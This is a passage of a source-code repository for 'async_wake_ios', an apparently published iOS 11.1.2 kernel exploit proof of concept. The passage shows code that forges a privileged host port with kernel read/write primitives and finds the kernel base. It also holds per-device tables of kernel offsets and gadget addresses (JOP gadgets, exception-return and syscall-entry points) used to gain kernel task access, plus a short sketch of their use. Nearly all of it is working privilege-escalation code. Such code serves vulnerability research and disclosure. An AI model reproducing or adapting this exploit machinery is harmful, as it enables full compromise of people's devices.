koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 32 | 33 | uint64_t base = realhost & ~0xfffULL; 34 | // walk down to find the magic: 35 | for (int i = 0; i < 0x10000; i++) { 36 | if (rk32(base) == 0xfeedfacf) { 37 | return base; 38 | } 39 | base -= 0x1000; 40 | } 41 | return 0; 42 | } 43 | mach_port_t fake_host_priv_port = MACH_PORT_NULL; 44 | 45 | // build a fake host priv port 46 | mach_port_t fake_host_priv() { 47 | if (fake_host_priv_port != MACH_PORT_NULL) { 48 | return fake_host_priv_port; 49 | } 50 | // get the address of realhost: 51 | uint64_t hostport_addr = find_port_address(mach_host_self(), MACH_MSG_TYPE_COPY_SEND); 52 | uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 53 | 54 | // allocate a port 55 | mach_port_t port = MACH_PORT_NULL; 56 | kern_return_t err; 57 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); 58 | if (err != KERN_SUCCESS) { 59 | printf("failed to allocate port\n"); 60 | return MACH_PORT_NULL; 61 | } 62 | 63 | // get a send right 64 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 65 | 66 | // locate the port 67 | uint64_t port_addr = find_port_address(port, MACH_MSG_TYPE_COPY_SEND); 68 | 69 | // change the type of the port 70 | #define 
IKOT_HOST_PRIV 4 71 | #define IO_ACTIVE 0x80000000 72 | wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV); 73 | 74 | // change the space of the port 75 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); 76 | 77 | // set the kobject 78 | wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost); 79 | 80 | fake_host_priv_port = port; 81 | 82 | return port; 83 | } 84 | -------------------------------------------------------------------------------- /async_wake_ios/kutils.h: -------------------------------------------------------------------------------- 1 | #ifndef kutils_h 2 | #define kutils_h 3 | 4 | #include 5 | 6 | uint64_t task_self_addr(void); 7 | uint64_t ipc_space_kernel(void); 8 | uint64_t find_kernel_base(void); 9 | 10 | uint64_t current_thread(void); 11 | 12 | mach_port_t fake_host_priv(void); 13 | 14 | #endif /* kutils_h */ 15 | -------------------------------------------------------------------------------- /async_wake_ios/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "AppDelegate.h" 3 | 4 | int main(int argc, char * argv[]) { 5 | @autoreleasepool { 6 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /async_wake_ios/symbols.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "symbols.h" 7 | #include "kmem.h" 8 | #include "kutils.h" 9 | 10 | // the offsets are unlikely to change between similar models and builds, but the symbol addresses will 11 | // the offsets are required to get the kernel r/w but the symbols aren't 12 | 13 | int* offsets = NULL; 14 | 15 | 16 | /* iOS 11.1.2 */ 17 | int kstruct_offsets_15B202[] = { 18 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 19 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT, 20 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE, 21 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP, 22 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT, 23 | 0x30, // KSTRUCT_OFFSET_TASK_PREV, 24 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE 25 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO, 26 | 27 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 28 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 29 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 30 | 0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 31 | 0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 32 | 0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 33 | 0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 34 | 0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 35 | 36 | 0x10, // KSTRUCT_OFFSET_PROC_PID, 37 | 38 | 0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE 39 | 40 | 0x180, // KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR 41 | 0x188, // KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR 42 | 0x190, // KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR 43 | 0x408, // KSTRUCT_OFFSET_THREAD_CONTEXT_DATA 44 | 0x410, // KSTRUCT_OFFSET_THREAD_UPCB 45 | 0x418, // KSTRUCT_OFFSET_THREAD_UNEON 46 | 0x420, // KSTRUCT_OFFSET_THREAD_KSTACKPTR 47 | 48 | 0x54, // KSTRUCT_OFFSET_PROCESSOR_CPU_ID 49 | 50 | 0x28, // KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR 51 | 0X78, // KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR 52 | }; 53 | 54 | int koffset(enum kstruct_offset offset) { 55 | if (offsets == NULL) { 56 | printf("need to call symbols_init() prior to querying offsets\n"); 57 | return 0; 58 | } 59 | return offsets[offset]; 60 | } 61 | 62 | // this is the base of the kernel, not 
the kernelcache 63 | uint64_t kernel_base = 0; 64 | uint64_t* symbols = NULL; 65 | uint64_t kaslr_slide = 0; 66 | 67 | // ip7 68 | uint64_t ksymbols_iphone_7_15B202[] = { 69 | 0xfffffff0074d74cc, // KSYMBOL_OSARRAY_GET_META_CLASS, 70 | 0xfffffff007566454, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 71 | 0xfffffff007567bfc, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 72 | 0xfffffff0073eb130, // KSYMBOL_CSBLOB_GET_CD_HASH 73 | 0xfffffff007101248, // KSYMBOL_KALLOC_EXTERNAL 74 | 0xfffffff007101278, // KSYMBOL_KFREE 75 | 0xfffffff0074d74d4, // KYSMBOL_RET 76 | 0xfffffff0074f11cc, // KSYMBOL_OSSERIALIZER_SERIALIZE, 77 | 0xfffffff00758c618, // KSYMBOL_KPRINTF 78 | 0xfffffff0074fc164, // KSYMBOL_UUID_COPY 79 | 0xfffffff0075b2000, // KSYMBOL_CPU_DATA_ENTRIES 80 | 0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER 81 | 0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET 82 | 0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN 83 | 0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN 84 | 0xfffffff0071e1998, // KSYMBOL_SET_MDSCR_EL1_GADGET 85 | 0xfffffff007439b20, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint 86 | 0xfffffff0071de074, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP 87 | 0xfffffff0071dea24, // KSYMBOL_SLEH_SYNC_EPILOG 88 | }; 89 | 90 | uint64_t ksymbols_iphone_x_15B202[] = { 91 | 0xfffffff0074f9948, // KSYMBOL_OSARRAY_GET_META_CLASS, 92 | 0xfffffff00758b03c, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 93 | 0xfffffff00758c7b0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 94 | 0xfffffff007400974, // KSYMBOL_CSBLOB_GET_CD_HASH 95 | 0xfffffff00710232c, // KSYMBOL_KALLOC_EXTERNAL 96 | 0xfffffff00710235c, // KSYMBOL_KFREE 97 | 0xfffffff007102358, // KYSMBOL_RET 98 | 0xfffffff007513324, // KSYMBOL_OSSERIALIZER_SERIALIZE, 99 | 0xfffffff0075b2694, // KSYMBOL_KPRINTF 100 | 0xfffffff00751e1d8, // KSYMBOL_UUID_COPY 101 | 0xfffffff0075d6000, // KSYMBOL_CPU_DATA_ENTRIES 102 | 0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER 103 | 0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET 104 | 0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN 105 | 0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN 106 | 0xfffffff0071e8630, // KSYMBOL_SET_MDSCR_EL1_GADGET 107 | 0xfffffff007454194, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint 108 | 0xfffffff0071e451c, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP 109 | 0xfffffff0071e4ed8, // KSYMBOL_SLEH_SYNC_EPILOG 110 | }; 111 | 112 | uint64_t ksymbols_ipod_touch_6g_15b202[] = { 113 | 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS, 114 | 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 115 | 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 116 | 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH 117 | 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL 118 | 0xFFFFFFF0070C8740, // KSYMBOL_KFREE 119 | 0xFFFFFFF0070C873C, // KYSMBOL_RET 120 | 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE, 121 | 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF 122 | 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY 123 | 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 124 | 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 125 | 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 126 | 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 127 | 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a 
bit before exception_return 128 | 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 129 | 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 130 | 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 131 | 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 132 | }; 133 | 134 | // 6p (N56ap) 135 | uint64_t ksymbol_iphone_6p_15b202[] = { 136 | 0xfffffff0074a4a4c, // __ZNK7OSArray12getMetaClassEv 137 | 0xfffffff007533cf8, // __ZNK12IOUserClient12getMetaClassEv 138 | 0xfffffff0075354a0, // __ZN12IOUserClient24getTargetAndTrapForIndexEPP9IOServicej 139 | 0xfffffff0073b71e4, // _csblob_get_cdhash 140 | 0xfffffff0070c8710, // _kalloc_external 141 | 0xfffffff0070c8740, // _kfree 142 | 0xFFFFFFF0070C873C, // ret 143 | 0xfffffff0074be978, // __ZNK12OSSerializer9serializeEP11OSSerialize 144 | 0xfffffff007559fd0, // kprintf 145 | 0xfffffff0074c9910, // _uuid_copy 146 | 0xfffffff00757E000, // _DATA:__data + 0x6000 147 | // 0x4DDE74 + 148 | 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 149 | 0xFFFFFFF007098180, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 150 | 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 151 | 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 152 | 0xFFFFFFF0071ACCB8, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 153 | 0xFFFFFFF0074062F0, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 154 | 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 155 | 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 
156 | 157 | }; 158 | 159 | uint64_t ksymbols_iphone_6s_15b202[] = { 160 | 0xFFFFFFF00748D548, // KSYMBOL_OSARRAY_GET_META_CLASS, 161 | 0xFFFFFFF00751C4D0, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 162 | 0xFFFFFFF00751DC78, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 163 | 0xFFFFFFF0073A1054, // KSYMBOL_CSBLOB_GET_CD_HASH 164 | 0xFFFFFFF0070B8088, // KSYMBOL_KALLOC_EXTERNAL 165 | 0xFFFFFFF0070B80B8, // KSYMBOL_KFREE 166 | 0xFFFFFFF0070B80B4, // KYSMBOL_RET 167 | 0xFFFFFFF0074A7248, // KSYMBOL_OSSERIALIZER_SERIALIZE, 168 | 0xFFFFFFF0075426C4, // KSYMBOL_KPRINTF 169 | 0xFFFFFFF0074B21E0, // KSYMBOL_UUID_COPY 170 | 0xFFFFFFF007566000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 171 | 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 172 | 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 173 | 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 174 | 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 175 | 0xFFFFFFF007197AB0, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 176 | 0xFFFFFFF0073EFB44, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 177 | 0xFFFFFFF0071941D8, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 178 | 0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 179 | }; 180 | 181 | uint64_t ksymbols_iphone_6_15b202[] = { 182 | 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS, 183 | 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 184 | 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 185 | 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH 186 | 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL 187 | 0xFFFFFFF0070C8740, // KSYMBOL_KFREE 188 | 0xFFFFFFF0070C873C, // KYSMBOL_RET 189 | 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE, 190 | 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF 191 | 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY 192 | 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 193 | 0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 194 | 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 195 | 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 196 | 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 197 | 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 198 | 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 199 | 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 200 | 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 
201 | }; 202 | 203 | uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = { 204 | 0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS, 205 | 0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS 206 | 0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX 207 | 0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH 208 | 0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL 209 | 0xFFFFFFF0070B85C0, // KSYMBOL_KFREE 210 | 0xFFFFFFF0070B85BC, // KYSMBOL_RET 211 | 0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE, 212 | 0xFFFFFFF007549D40, // KSYMBOL_KPRINTF 213 | 0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY 214 | 0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment 215 | 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1)) 216 | 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register) 217 | 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF] 218 | 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return 219 | 0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1 220 | 0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint) 221 | 0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49 222 | 0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code." 223 | }; 224 | 225 | uint64_t ksym(enum ksymbol sym) { 226 | if (kernel_base == 0) { 227 | if (!have_kmem_read()) { 228 | printf("attempted to use symbols prior to gaining kernel read\n"); 229 | return 0; 230 | } 231 | kernel_base = find_kernel_base(); 232 | kaslr_slide = find_kernel_base() - 0xFFFFFFF007004000; 233 | } 234 | //return symbols[sym] + kernel_base; 235 | return symbols[sym] + kaslr_slide; 236 | } 237 | 238 | int have_syms = 0; 239 | int probably_have_correct_symbols() { 240 | return have_syms; 241 | } 242 | 243 | void offsets_init() { 244 | size_t size = 32; 245 | char build_id[size]; 246 | memset(build_id, 0, size); 247 | int err = sysctlbyname("kern.osversion", build_id, &size, NULL, 0); 248 | if (err == -1) { 249 | printf("failed to detect version (sysctlbyname failed\n"); 250 | return; 251 | } 252 | printf("build_id: %s\n", build_id); 253 | 254 | struct utsname u = {0}; 255 | uname(&u); 256 | 257 | printf("sysname: %s\n", u.sysname); 258 | printf("nodename: %s\n", u.nodename); 259 | printf("release: %s\n", u.release); 260 | printf("version: %s\n", u.version); 261 | printf("machine: %s\n", u.machine); 262 | 263 | // set the offsets 264 | 265 | if (strcmp(build_id, "15B202") == 0) { 266 | offsets = kstruct_offsets_15B202; 267 | } else { 268 | offsets = kstruct_offsets_15B202; 269 | printf("unknown kernel build. 
If this is iOS 11 it might still be able to get tfp0, trying anyway\n"); 270 | have_syms = 0; 271 | return; 272 | } 273 | 274 | // set the symbols 275 | 276 | if (strstr(u.machine, "iPod7,1")) { 277 | printf("this is iPod Touch 6G, should work!\n"); 278 | symbols = ksymbols_ipod_touch_6g_15b202; 279 | have_syms = 1; 280 | } else if (strstr(u.machine, "iPhone9,3")) { 281 | printf("this is iPhone 7, should work!\n"); 282 | symbols = ksymbols_iphone_7_15B202; 283 | have_syms = 1; 284 | } else if (strstr(u.machine, "iPhone9,4")) { 285 | printf("this is iPhone 7 plus, should work!\n"); 286 | symbols = ksymbols_iphone_7_15B202; 287 | have_syms = 1; 288 | } else if (strstr(u.machine, "iPhone10,6")) { 289 | printf("this is iPhone X, should work!\n"); 290 | symbols = ksymbols_iphone_x_15B202; 291 | have_syms = 1; 292 | } else if (strstr(u.machine, "iPhone8,1")) { 293 | printf("this is iPhone 6s, should work!\n"); 294 | symbols = ksymbols_iphone_6s_15b202; 295 | have_syms = 1; 296 | } else if (strstr(u.machine, "iPhone7,1")) { 297 | printf("this is iPhone 6P, should work!\n"); 298 | symbols = ksymbol_iphone_6p_15b202; 299 | have_syms = 1; 300 | } else if (strstr(u.machine, "iPhone7,2")) { 301 | printf("this is iPhone 6, should work!\n"); 302 | symbols = ksymbols_iphone_6_15b202; 303 | have_syms = 1; 304 | } else if (strstr(u.machine, "iPad4,4")) { 305 | printf("this is iPad Mini 2 WiFi, should work!\n"); 306 | symbols = ksymbols_ipad_mini_2_wifi_15b202; 307 | have_syms = 1; 308 | } else if (strstr(u.machine, "iPhone6,2")) { 309 | printf("this is iPhone 5s, should work!\n"); 310 | symbols = ksymbols_ipad_mini_2_wifi_15b202; 311 | have_syms = 1; 312 | } else { 313 | printf("no symbols for this device yet\n"); 314 | printf("tfp0 should still work, but the kernel debugger PoC won't\n"); 315 | symbols = NULL; 316 | have_syms = 0; 317 | } 318 | } 319 | -------------------------------------------------------------------------------- /async_wake_ios/symbols.h: -------------------------------------------------------------------------------- 1 | #ifndef symbols_h 2 | #define symbols_h 3 | 4 | #include 5 | 6 | enum kstruct_offset { 7 | /* struct task */ 8 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 9 | KSTRUCT_OFFSET_TASK_REF_COUNT, 10 | KSTRUCT_OFFSET_TASK_ACTIVE, 11 | KSTRUCT_OFFSET_TASK_VM_MAP, 12 | KSTRUCT_OFFSET_TASK_NEXT, 13 | KSTRUCT_OFFSET_TASK_PREV, 14 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 15 | KSTRUCT_OFFSET_TASK_BSD_INFO, 16 | 17 | /* struct ipc_port */ 18 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 19 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 20 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 21 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 22 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 23 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 24 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 25 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 26 | 27 | /* struct proc */ 28 | KSTRUCT_OFFSET_PROC_PID, 29 | 30 | /* struct ipc_space */ 31 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 32 | 33 | /* struct thread */ 34 | KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR, 35 | KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR, 36 | KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR, 37 | KSTRUCT_OFFSET_THREAD_CONTEXT_DATA, // thread.machine.contextData 38 | KSTRUCT_OFFSET_THREAD_UPCB, // thread.machine.upcb 39 | KSTRUCT_OFFSET_THREAD_UNEON, // thread.machine.uNeon 40 | KSTRUCT_OFFSET_THREAD_KSTACKPTR, 41 | 42 | /* struct processor */ 43 | KSTRUCT_OFFSET_PROCESSOR_CPU_ID, 44 | 45 | /* struct cpu_data */ 46 | KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR, // despite the name this actually points to the top of the stack, not the bottom 47 | 
KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR, 48 | }; 49 | 50 | 51 | 52 | // the 53 | 54 | enum ksymbol { 55 | KSYMBOL_OSARRAY_GET_META_CLASS, 56 | KSYMBOL_IOUSERCLIENT_GET_META_CLASS, 57 | KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX, 58 | KSYMBOL_CSBLOB_GET_CD_HASH, 59 | KSYMBOL_KALLOC_EXTERNAL, 60 | KSYMBOL_KFREE, 61 | KSYMBOL_RET, 62 | KSYMBOL_OSSERIALIZER_SERIALIZE, 63 | KSYMBOL_KPRINTF, 64 | KSYMBOL_UUID_COPY, 65 | KSYMBOL_CPU_DATA_ENTRIES, 66 | KSYMBOL_VALID_LINK_REGISTER, 67 | KSYMBOL_X21_JOP_GADGET, 68 | KSYMBOL_EXCEPTION_RETURN, 69 | KSYMBOL_THREAD_EXCEPTION_RETURN, 70 | KSYMBOL_SET_MDSCR_EL1_GADGET, 71 | KSYMBOL_WRITE_SYSCALL_ENTRYPOINT, 72 | KSYMBOL_EL1_HW_BP_INFINITE_LOOP, 73 | KSYMBOL_SLEH_SYNC_EPILOG 74 | }; 75 | 76 | int koffset(enum kstruct_offset); 77 | 78 | uint64_t ksym(enum ksymbol); 79 | 80 | void offsets_init(void); 81 | void symbols_init(void); 82 | int probably_have_correct_symbols(void); 83 | 84 | #endif 85 | --------------------------------------------------------------------------------
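
For reference, the offset and symbol tables above are consumed the same way throughout kdbg.c and kutils.c: offsets_init() selects the per-build/per-device arrays, koffset() values are added to kernel pointers read with rk64(), and ksym() rebases the hardcoded 15B202 addresses by the KASLR slide. A minimal sketch of that pattern follows (the helper name is hypothetical; kernel read is assumed to already work).

#include <stdio.h>
#include <mach/mach.h>
#include "symbols.h"
#include "kmem.h"
#include "find_port.h"

// sketch: resolve the current thread's thread_t and dump its kernel stack
// pointer, the same koffset()/ksym() pattern used by handle_kernel_bp_hits
void dump_current_thread_kstackptr(void) {
  offsets_init();                                 // choose offsets/symbols for this build+device
  if (!probably_have_correct_symbols()) {
    printf("no symbols for this device; the kdbg PoC won't work\n");
    return;
  }
  uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND);
  uint64_t thread_t_addr    = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
  uint64_t kstackptr        = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR));
  printf("kstackptr: 0x%llx, write() bp target: 0x%llx\n",
         kstackptr, ksym(KSYMBOL_WRITE_SYSCALL_ENTRYPOINT));
}
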